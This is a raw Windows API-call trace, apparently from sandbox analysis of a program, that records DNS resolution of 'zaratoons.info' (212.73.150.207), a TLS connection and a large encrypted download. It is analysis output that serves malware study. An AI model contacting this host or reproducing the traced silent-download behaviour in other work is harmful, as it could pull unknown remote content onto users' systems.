	[0835.629] GetCurrentProcess () returned 0xffffffffffffffff
	[0835.630] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86cf38 | out: TokenHandle=0x1c86cf38*=0x464) returned 1
	[0835.642] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x1c86d838 | out: pProxyConfig=0x1c86d838) returned 1
	[0839.625] SetEvent (hEvent=0x3ac) returned 1
	[0841.053] GetCurrentProcess () returned 0xffffffffffffffff
	[0841.053] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86cfa8 | out: TokenHandle=0x1c86cfa8*=0x4b4) returned 1
	[0841.056] GetCurrentProcess () returned 0xffffffffffffffff
	[0841.056] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86cfa8 | out: TokenHandle=0x1c86cfa8*=0x4b8) returned 1
	[0841.057] SetEvent (hEvent=0x3ac) returned 1
	[0845.467] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x1c86d478 | out: pFixedInfo=0x0, pOutBufLen=0x1c86d478) returned 0x6f
	[0847.761] LocalAlloc (uFlags=0x0, uBytes=0x258) returned 0x1b8be3e0
	[0847.761] GetNetworkParams (in: pFixedInfo=0x1b8be3e0, pOutBufLen=0x1c86d478 | out: pFixedInfo=0x1b8be3e0, pOutBufLen=0x1c86d478) returned 0x0
	[0847.774] CoTaskMemAlloc (cb=0xd) returned 0x1b8d80c0
	[0847.774] inet_addr (cp="192.168.0.1") returned 0x100a8c0
	[0847.774] CoTaskMemFree (pv=0x1b8d80c0) 
	[0847.777] LocalFree (hMem=0x1b8be3e0) returned 0x0
	[0848.748] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4cc
	[0848.749] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4c8
	[0848.751] CoTaskMemAlloc (cb=0x10) returned 0x1b8d80c0
	[0848.753] getaddrinfo (in: pNodeName="zaratoons.info", pServiceName=0x0, pHints=0x1c86d420*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x1c86d418 | out: ppResult=0x1c86d418*=0x1b8bfbf0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="zaratoons.info", ai_addr=0x1b8d82c0*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) returned 0
	[0852.220] CoTaskMemFree (pv=0x1b8d80c0) 
	[0852.220] CoTaskMemFree (pv=0x0) 
	[0852.222] FreeAddrInfoW (pAddrInfo=0x1b8bfbf0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="慺慲潴湯⹳湩潦", ai_addr=0x1b8d82c0*(sa_family=2, sin_port=0x0, sin_addr="212.73.150.207"), ai_next=0x0)) 
	[0852.223] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4dc
	[0852.224] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4d4
	[0852.224] ioctlsocket (in: s=0x4dc, cmd=-2147195266, argp=0x1c86d438 | out: argp=0x1c86d438) returned 0
	[0852.224] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x4e4
	[0852.224] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4e8
	[0852.224] ioctlsocket (in: s=0x4e4, cmd=-2147195266, argp=0x1c86d438 | out: argp=0x1c86d438) returned 0
	[0852.224] WSAIoctl (in: s=0x4dc, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c86d3b0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c86d3b0, lpOverlapped=0x0) returned -1
	[0852.224] CoTaskMemAlloc (cb=0x204) returned 0xf4aa0
	[0852.224] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xf4aa0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0852.224] CoTaskMemFree (pv=0xf4aa0) 
	[0852.225] WSAEventSelect (s=0x4dc, hEventObject=0x4d4, lNetworkEvents=512) returned 0
	[0852.225] WSAIoctl (in: s=0x4e4, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x1c86d3b0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x1c86d3b0, lpOverlapped=0x0) returned -1
	[0852.225] CoTaskMemAlloc (cb=0x204) returned 0xf4aa0
	[0852.225] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0xf4aa0, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45
	[0852.225] CoTaskMemFree (pv=0xf4aa0) 
	[0852.225] WSAEventSelect (s=0x4e4, hEventObject=0x4e8, lNetworkEvents=512) returned 0
	[0852.227] GetAdaptersAddresses () returned 0x6f
	[0852.890] LocalAlloc (uFlags=0x0, uBytes=0xbe8) returned 0x1b8ede30
	[0852.890] GetAdaptersAddresses () returned 0x0
	[0852.950] LocalFree (hMem=0x1b8ede30) returned 0x0
	[0852.953] WSAConnect (in: s=0x4cc, name=0x30066f0*(sa_family=2, sin_port=0x1bb, sin_addr="212.73.150.207"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0853.145] closesocket (s=0x4c8) returned 0
	[0853.211] EnumerateSecurityPackagesW (in: pcPackages=0x1c86d298, ppPackageInfo=0x1c86d290 | out: pcPackages=0x1c86d298, ppPackageInfo=0x1c86d290) returned 0x0
	[0853.215] lstrlenW (lpString="Negotiate") returned 9
	[0853.216] CoTaskMemAlloc (cb=0x16) returned 0x1b8d82a0
	[0853.216] RtlMoveMemory (in: Destination=0x1b8d82a0, Source=0xd0b90, Length=0x14 | out: Destination=0x1b8d82a0) 
	[0853.216] CoTaskMemFree (pv=0x1b8d82a0) 
	[0853.216] lstrlenW (lpString="Microsoft Package Negotiator") returned 28
	[0853.216] CoTaskMemAlloc (cb=0x3c) returned 0x1b8c1490
	[0853.217] RtlMoveMemory (in: Destination=0x1b8c1490, Source=0xd0ba4, Length=0x3a | out: Destination=0x1b8c1490) 
	[0853.217] CoTaskMemFree (pv=0x1b8c1490) 
	[0853.217] lstrlenW (lpString="NegoExtender") returned 12
	[0853.217] CoTaskMemAlloc (cb=0x1c) returned 0x1b8dd550
	[0853.217] RtlMoveMemory (in: Destination=0x1b8dd550, Source=0xd0bde, Length=0x1a | out: Destination=0x1b8dd550) 
	[0853.217] CoTaskMemFree (pv=0x1b8dd550) 
	[0853.217] lstrlenW (lpString="NegoExtender Security Package") returned 29
	[0853.217] CoTaskMemAlloc (cb=0x3e) returned 0x1b8c1490
	[0853.217] RtlMoveMemory (in: Destination=0x1b8c1490, Source=0xd0bf8, Length=0x3c | out: Destination=0x1b8c1490) 
	[0853.217] CoTaskMemFree (pv=0x1b8c1490) 
	[0853.217] lstrlenW (lpString="Kerberos") returned 8
	[0853.217] CoTaskMemAlloc (cb=0x14) returned 0x1b8d82a0
	[0853.217] RtlMoveMemory (in: Destination=0x1b8d82a0, Source=0xd0c34, Length=0x12 | out: Destination=0x1b8d82a0) 
	[0853.217] CoTaskMemFree (pv=0x1b8d82a0) 
	[0853.217] lstrlenW (lpString="Microsoft Kerberos V1.0") returned 23
	[0853.217] CoTaskMemAlloc (cb=0x32) returned 0x1b8bfc70
	[0853.217] RtlMoveMemory (in: Destination=0x1b8bfc70, Source=0xd0c46, Length=0x30 | out: Destination=0x1b8bfc70) 
	[0853.217] CoTaskMemFree (pv=0x1b8bfc70) 
	[0853.217] lstrlenW (lpString="NTLM") returned 4
	[0853.218] CoTaskMemAlloc (cb=0xc) returned 0x1b8d82a0
	[0853.218] RtlMoveMemory (in: Destination=0x1b8d82a0, Source=0xd0c76, Length=0xa | out: Destination=0x1b8d82a0) 
	[0853.218] CoTaskMemFree (pv=0x1b8d82a0) 
	[0853.218] lstrlenW (lpString="NTLM Security Package") returned 21
	[0853.218] CoTaskMemAlloc (cb=0x2e) returned 0x1b8bfc70
	[0853.218] RtlMoveMemory (in: Destination=0x1b8bfc70, Source=0xd0c80, Length=0x2c | out: Destination=0x1b8bfc70) 
	[0853.218] CoTaskMemFree (pv=0x1b8bfc70) 
	[0853.218] lstrlenW (lpString="Schannel") returned 8
	[0853.218] CoTaskMemAlloc (cb=0x14) returned 0x1b8d82a0
	[0853.218] RtlMoveMemory (in: Destination=0x1b8d82a0, Source=0xd0cac, Length=0x12 | out: Destination=0x1b8d82a0) 
	[0853.218] CoTaskMemFree (pv=0x1b8d82a0) 
	[0853.218] lstrlenW (lpString="Schannel Security Package") returned 25
	[0853.218] CoTaskMemAlloc (cb=0x36) returned 0x1b8bfc70
	[0853.218] RtlMoveMemory (in: Destination=0x1b8bfc70, Source=0xd0cbe, Length=0x34 | out: Destination=0x1b8bfc70) 
	[0853.218] CoTaskMemFree (pv=0x1b8bfc70) 
	[0853.218] lstrlenW (lpString="Microsoft Unified Security Protocol Provider") returned 44
	[0853.218] CoTaskMemAlloc (cb=0x5c) returned 0x1b8afa60
	[0853.218] RtlMoveMemory (in: Destination=0x1b8afa60, Source=0xd0cf2, Length=0x5a | out: Destination=0x1b8afa60) 
	[0853.218] CoTaskMemFree (pv=0x1b8afa60) 
	[0853.218] lstrlenW (lpString="Schannel Security Package") returned 25
	[0853.219] CoTaskMemAlloc (cb=0x36) returned 0x1b8bfc70
	[0853.219] RtlMoveMemory (in: Destination=0x1b8bfc70, Source=0xd0d4c, Length=0x34 | out: Destination=0x1b8bfc70) 
	[0853.219] CoTaskMemFree (pv=0x1b8bfc70) 
	[0853.219] lstrlenW (lpString="WDigest") returned 7
	[0853.219] CoTaskMemAlloc (cb=0x12) returned 0x1b8d82a0
	[0853.219] RtlMoveMemory (in: Destination=0x1b8d82a0, Source=0xd0d80, Length=0x10 | out: Destination=0x1b8d82a0) 
	[0853.219] CoTaskMemFree (pv=0x1b8d82a0) 
	[0853.219] lstrlenW (lpString="Digest Authentication for Windows") returned 33
	[0853.219] CoTaskMemAlloc (cb=0x46) returned 0x1b8c1490
	[0853.219] RtlMoveMemory (in: Destination=0x1b8c1490, Source=0xd0d90, Length=0x44 | out: Destination=0x1b8c1490) 
	[0853.219] CoTaskMemFree (pv=0x1b8c1490) 
	[0853.219] lstrlenW (lpString="TSSSP") returned 5
	[0853.219] CoTaskMemAlloc (cb=0xe) returned 0x1b8d82a0
	[0853.219] RtlMoveMemory (in: Destination=0x1b8d82a0, Source=0xd0dd4, Length=0xc | out: Destination=0x1b8d82a0) 
	[0853.219] CoTaskMemFree (pv=0x1b8d82a0) 
	[0853.219] lstrlenW (lpString="TS Service Security Package") returned 27
	[0853.219] CoTaskMemAlloc (cb=0x3a) returned 0x1b8c1490
	[0853.219] RtlMoveMemory (in: Destination=0x1b8c1490, Source=0xd0de0, Length=0x38 | out: Destination=0x1b8c1490) 
	[0853.219] CoTaskMemFree (pv=0x1b8c1490) 
	[0853.219] lstrlenW (lpString="pku2u") returned 5
	[0853.219] CoTaskMemAlloc (cb=0xe) returned 0x1b8d82a0
	[0853.220] RtlMoveMemory (in: Destination=0x1b8d82a0, Source=0xd0e18, Length=0xc | out: Destination=0x1b8d82a0) 
	[0853.220] CoTaskMemFree (pv=0x1b8d82a0) 
	[0853.220] lstrlenW (lpString="PKU2U Security Package") returned 22
	[0853.220] CoTaskMemAlloc (cb=0x30) returned 0x1b8bfc70
	[0853.220] RtlMoveMemory (in: Destination=0x1b8bfc70, Source=0xd0e24, Length=0x2e | out: Destination=0x1b8bfc70) 
	[0853.220] CoTaskMemFree (pv=0x1b8bfc70) 
	[0853.220] lstrlenW (lpString="CREDSSP") returned 7
	[0853.220] CoTaskMemAlloc (cb=0x12) returned 0x1b8d82a0
	[0853.220] RtlMoveMemory (in: Destination=0x1b8d82a0, Source=0xd0e52, Length=0x10 | out: Destination=0x1b8d82a0) 
	[0853.220] CoTaskMemFree (pv=0x1b8d82a0) 
	[0853.220] lstrlenW (lpString="Microsoft CredSSP Security Provider") returned 35
	[0853.220] CoTaskMemAlloc (cb=0x4a) returned 0x1b8e1ed0
	[0853.220] RtlMoveMemory (in: Destination=0x1b8e1ed0, Source=0xd0e62, Length=0x48 | out: Destination=0x1b8e1ed0) 
	[0853.220] CoTaskMemFree (pv=0x1b8e1ed0) 
	[0853.221] FreeContextBuffer (in: pvContextBuffer=0xd0a50 | out: pvContextBuffer=0xd0a50) returned 0x0
	[0854.650] GetCurrentProcess () returned 0xffffffffffffffff
	[0854.650] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c86cd78 | out: TokenHandle=0x1c86cd78*=0x4c8) returned 1
	[0854.654] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x300a8a8, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x1c86cc88, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1c86cc78, ptsExpiry=0x1c86cc70 | out: phCredential=0x1c86cc78, ptsExpiry=0x1c86cc70) returned 0x0
	[0854.662] InitializeSecurityContextW (in: phCredential=0x1c86ce80, phContext=0x0, pTargetName=0x2fff310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1c86ce70, pOutput=0x300cff0, pfContextAttr=0x1c86ce68, ptsExpiry=0x1c86ce60 | out: phNewContext=0x1c86ce70, pOutput=0x300cff0, pfContextAttr=0x1c86ce68, ptsExpiry=0x1c86ce60) returned 0x90312
	[0854.663] FreeContextBuffer (in: pvContextBuffer=0x1b8d4450 | out: pvContextBuffer=0x1b8d4450) returned 0x0
	[0854.670] send (s=0x4cc, buf=0x300d0c0*, len=118, flags=0) returned 118
	[0854.671] recv (in: s=0x4cc, buf=0x300d0c0, len=5, flags=0 | out: buf=0x300d0c0*) returned 5
	[0856.392] recv (in: s=0x4cc, buf=0x300d0c5, len=93, flags=0 | out: buf=0x300d0c5*) returned 93
	[0856.393] InitializeSecurityContextW (in: phCredential=0x1c86cda0, phContext=0x1c86d050, pTargetName=0x2fff310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x300d3d0, Reserved2=0x0, phNewContext=0x1c86cd90, pOutput=0x300d3f0, pfContextAttr=0x1c86cd88, ptsExpiry=0x1c86cd80 | out: phNewContext=0x1c86cd90, pOutput=0x300d3f0, pfContextAttr=0x1c86cd88, ptsExpiry=0x1c86cd80) returned 0x90312
	[0856.393] recv (in: s=0x4cc, buf=0x300d4e0, len=5, flags=0 | out: buf=0x300d4e0*) returned 5
	[0856.393] recv (in: s=0x4cc, buf=0x300d505, len=2556, flags=0 | out: buf=0x300d505*) returned 2556
	[0856.393] InitializeSecurityContextW (in: phCredential=0x1c86ccd0, phContext=0x1c86cf80, pTargetName=0x2fff310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x300dfd8, Reserved2=0x0, phNewContext=0x1c86ccc0, pOutput=0x300dff8, pfContextAttr=0x1c86ccb8, ptsExpiry=0x1c86ccb0 | out: phNewContext=0x1c86ccc0, pOutput=0x300dff8, pfContextAttr=0x1c86ccb8, ptsExpiry=0x1c86ccb0) returned 0x90312
	[0856.394] recv (in: s=0x4cc, buf=0x300e0e8, len=5, flags=0 | out: buf=0x300e0e8*) returned 5
	[0856.394] recv (in: s=0x4cc, buf=0x300e10d, len=331, flags=0 | out: buf=0x300e10d*) returned 331
	[0856.394] InitializeSecurityContextW (in: phCredential=0x1c86cc00, phContext=0x1c86ceb0, pTargetName=0x2fff310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x300e328, Reserved2=0x0, phNewContext=0x1c86cbf0, pOutput=0x300e348, pfContextAttr=0x1c86cbe8, ptsExpiry=0x1c86cbe0 | out: phNewContext=0x1c86cbf0, pOutput=0x300e348, pfContextAttr=0x1c86cbe8, ptsExpiry=0x1c86cbe0) returned 0x90312
	[0856.394] recv (in: s=0x4cc, buf=0x300e438, len=5, flags=0 | out: buf=0x300e438*) returned 5
	[0856.394] recv (in: s=0x4cc, buf=0x300e45d, len=4, flags=0 | out: buf=0x300e45d*) returned 4
	[0856.394] InitializeSecurityContextW (in: phCredential=0x1c86cb30, phContext=0x1c86cde0, pTargetName=0x2fff310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x300e538, Reserved2=0x0, phNewContext=0x1c86cb20, pOutput=0x300e558, pfContextAttr=0x1c86cb18, ptsExpiry=0x1c86cb10 | out: phNewContext=0x1c86cb20, pOutput=0x300e558, pfContextAttr=0x1c86cb18, ptsExpiry=0x1c86cb10) returned 0x90312
	[0856.404] FreeContextBuffer (in: pvContextBuffer=0x1b87b6f0 | out: pvContextBuffer=0x1b87b6f0) returned 0x0
	[0856.404] send (s=0x4cc, buf=0x300e628*, len=134, flags=0) returned 134
	[0856.407] recv (in: s=0x4cc, buf=0x300e628, len=5, flags=0 | out: buf=0x300e628*) returned 5
	[0856.618] recv (in: s=0x4cc, buf=0x300e62d, len=1, flags=0 | out: buf=0x300e62d*) returned 1
	[0856.618] InitializeSecurityContextW (in: phCredential=0x1c86ca60, phContext=0x1c86cd10, pTargetName=0x2fff310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x300e7a0, Reserved2=0x0, phNewContext=0x1c86ca50, pOutput=0x300e7c0, pfContextAttr=0x1c86ca48, ptsExpiry=0x1c86ca40 | out: phNewContext=0x1c86ca50, pOutput=0x300e7c0, pfContextAttr=0x1c86ca48, ptsExpiry=0x1c86ca40) returned 0x90312
	[0856.659] recv (in: s=0x4cc, buf=0x300e8b0, len=5, flags=0 | out: buf=0x300e8b0*) returned 5
	[0856.659] recv (in: s=0x4cc, buf=0x300e8d5, len=48, flags=0 | out: buf=0x300e8d5*) returned 48
	[0856.659] InitializeSecurityContextW (in: phCredential=0x1c86c990, phContext=0x1c86cc40, pTargetName=0x2fff310, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x300e9d8, Reserved2=0x0, phNewContext=0x1c86c980, pOutput=0x300e9f8, pfContextAttr=0x1c86c978, ptsExpiry=0x1c86c970 | out: phNewContext=0x1c86c980, pOutput=0x300e9f8, pfContextAttr=0x1c86c978, ptsExpiry=0x1c86c970) returned 0x0
	[0857.871] QueryContextAttributesW (in: phContext=0x1c86cbf0, ulAttribute=0x4, pBuffer=0x300eb10 | out: pBuffer=0x300eb10) returned 0x0
	[0857.872] QueryContextAttributesW (in: phContext=0x1c86cbf0, ulAttribute=0x5a, pBuffer=0x300eb90 | out: pBuffer=0x300eb90) returned 0x0
	[0857.881] QueryContextAttributesW (in: phContext=0x1c86caa0, ulAttribute=0x53, pBuffer=0x300eee0 | out: pBuffer=0x300eee0) returned 0x0
	[0857.888] CertDuplicateCRLContext (pCrlContext=0x1b8b6890) returned 0x1b8b6890
	[0857.892] CertDuplicateStore (hCertStore=0x110f50) returned 0x110f50
	[0857.892] CertEnumCertificatesInStore (hCertStore=0x110f50, pPrevCertContext=0x0) returned 0x1b8b6910
	[0857.893] CertDuplicateCRLContext (pCrlContext=0x1b8b6910) returned 0x1b8b6910
	[0857.893] CertEnumCertificatesInStore (hCertStore=0x110f50, pPrevCertContext=0x1b8b6910) returned 0x1b8b6890
	[0857.893] CertDuplicateCRLContext (pCrlContext=0x1b8b6890) returned 0x1b8b6890
	[0857.893] CertEnumCertificatesInStore (hCertStore=0x110f50, pPrevCertContext=0x1b8b6890) returned 0x0
	[0857.894] CertCloseStore (hCertStore=0x110f50, dwFlags=0x0) returned 1
	[0857.894] CertFreeCRLContext (pCrlContext=0x1b8b6890) returned 1
	[0857.901] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x110e80
	[0857.902] CertAddCRLLinkToStore (in: hCertStore=0x110e80, pCrlContext=0x1b8b6910, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0857.902] CertAddCRLLinkToStore (in: hCertStore=0x110e80, pCrlContext=0x1b8b6890, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0857.905] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1b8b6890, pTime=0x1c86caa8, hAdditionalStore=0x110e80, pChainPara=0x1c86cab0, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x1c86caa0 | out: ppChainContext=0x1c86caa0) returned 1
	[0868.912] CertDuplicateCertificateChain (pChainContext=0x1ce73010) returned 0x1ce73010
	[0868.914] CertDuplicateCRLContext (pCrlContext=0x1b8b6890) returned 0x1b8b6890
	[0868.914] CertDuplicateCRLContext (pCrlContext=0x1cead2c0) returned 0x1cead2c0
	[0868.914] CertDuplicateCRLContext (pCrlContext=0x1cead340) returned 0x1cead340
	[0868.915] CertFreeCertificateChain (pChainContext=0x1ce73010) 
	[0868.916] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1ce73010, pPolicyPara=0x1c86cc28, pPolicyStatus=0x1c86cc08 | out: pPolicyStatus=0x1c86cc08) returned 1
	[0868.917] SetLastError (dwErrCode=0x0) 
	[0868.921] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1ce73010, pPolicyPara=0x1c86cd00, pPolicyStatus=0x1c86cce8 | out: pPolicyStatus=0x1c86cce8) returned 1
	[0869.653] CertFreeCertificateChain (pChainContext=0x1ce73010) 
	[0869.653] CertFreeCRLContext (pCrlContext=0x1b8b6890) returned 1
	[0869.657] EncryptMessage (in: phContext=0x1c86d2b0, fQOP=0x0, pMessage=0x3011610, MessageSeqNo=0x0 | out: pMessage=0x3011610) returned 0x0
	[0869.657] send (s=0x4cc, buf=0x3011350*, len=117, flags=0) returned 117
	[0871.048] setsockopt (s=0x4cc, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0
	[0871.049] recv (in: s=0x4cc, buf=0x3011770, len=5, flags=0 | out: buf=0x3011770*) returned 5
	[0871.049] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 5355
	[0871.049] recv (in: s=0x4cc, buf=0x3012c80, len=11061, flags=0 | out: buf=0x3012c80*) returned 11061
	[0871.471] DecryptMessage (in: phContext=0x1c86ce70, pMessage=0x30158c8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x30158c8, pfQOP=0x0) returned 0x0
	[0871.533] setsockopt (s=0x4cc, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0
	[0871.543] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0871.543] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 5014
	[0871.543] recv (in: s=0x4cc, buf=0x3012b2b, len=11402, flags=0 | out: buf=0x3012b2b*) returned 11402
	[0871.773] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3036ed8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3036ed8, pfQOP=0x0) returned 0x0
	[0871.773] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0871.774] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 385
	[0871.774] recv (in: s=0x4cc, buf=0x3011916, len=16031, flags=0 | out: buf=0x3011916*) returned 12864
	[0872.765] recv (in: s=0x4cc, buf=0x3014b56, len=3167, flags=0 | out: buf=0x3014b56*) returned 3167
	[0872.825] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3037118, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3037118, pfQOP=0x0) returned 0x0
	[0872.826] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0872.826] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 3260
	[0872.826] recv (in: s=0x4cc, buf=0x3012451, len=13156, flags=0 | out: buf=0x3012451*) returned 13156
	[0873.074] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3037358, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3037358, pfQOP=0x0) returned 0x0
	[0873.075] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0873.075] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 775
	[0873.075] recv (in: s=0x4cc, buf=0x3011a9c, len=15641, flags=0 | out: buf=0x3011a9c*) returned 15641
	[0873.333] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3037598, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3037598, pfQOP=0x0) returned 0x0
	[0873.337] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0873.337] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 7938
	[0873.337] recv (in: s=0x4cc, buf=0x3013697, len=8478, flags=0 | out: buf=0x3013697*) returned 8478
	[0873.516] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3037828, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3037828, pfQOP=0x0) returned 0x0
	[0873.516] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0873.516] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 6525
	[0873.517] recv (in: s=0x4cc, buf=0x3013112, len=9891, flags=0 | out: buf=0x3013112*) returned 9891
	[0873.696] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3037a68, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3037a68, pfQOP=0x0) returned 0x0
	[0873.697] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0873.697] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 7256
	[0873.697] recv (in: s=0x4cc, buf=0x30133ed, len=9160, flags=0 | out: buf=0x30133ed*) returned 9160
	[0874.121] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3037ca8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3037ca8, pfQOP=0x0) returned 0x0
	[0874.122] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0874.122] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 483
	[0874.122] recv (in: s=0x4cc, buf=0x3011978, len=15933, flags=0 | out: buf=0x3011978*) returned 15933
	[0874.626] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3037f10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3037f10, pfQOP=0x0) returned 0x0
	[0874.627] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0874.627] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 142
	[0874.627] recv (in: s=0x4cc, buf=0x3011823, len=16274, flags=0 | out: buf=0x3011823*) returned 6432
	[0874.845] recv (in: s=0x4cc, buf=0x3013143, len=9842, flags=0 | out: buf=0x3013143*) returned 7504
	[0874.845] recv (in: s=0x4cc, buf=0x3014e93, len=2338, flags=0 | out: buf=0x3014e93*) returned 2338
	[0874.936] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3038150, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3038150, pfQOP=0x0) returned 0x0
	[0874.942] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0874.942] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 7305
	[0874.942] recv (in: s=0x4cc, buf=0x301341e, len=9111, flags=0 | out: buf=0x301341e*) returned 9111
	[0875.032] DecryptMessage (in: phContext=0x1c86d440, pMessage=0x3038390, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x3038390, pfQOP=0x0) returned 0x0
	[0875.033] recv (in: s=0x4cc, buf=0x3011790, len=5, flags=0 | out: buf=0x3011790*) returned 5
	[0875.033] recv (in: s=0x4cc, buf=0x3011795, len=16416, flags=0 | out: buf=0x3011795*) returned 1604
	[0875.033] recv (in: s=0x4cc, buf=0x3011dd9, len=14812, flags=0 | out: buf=0x3011dd9*) returned 14812
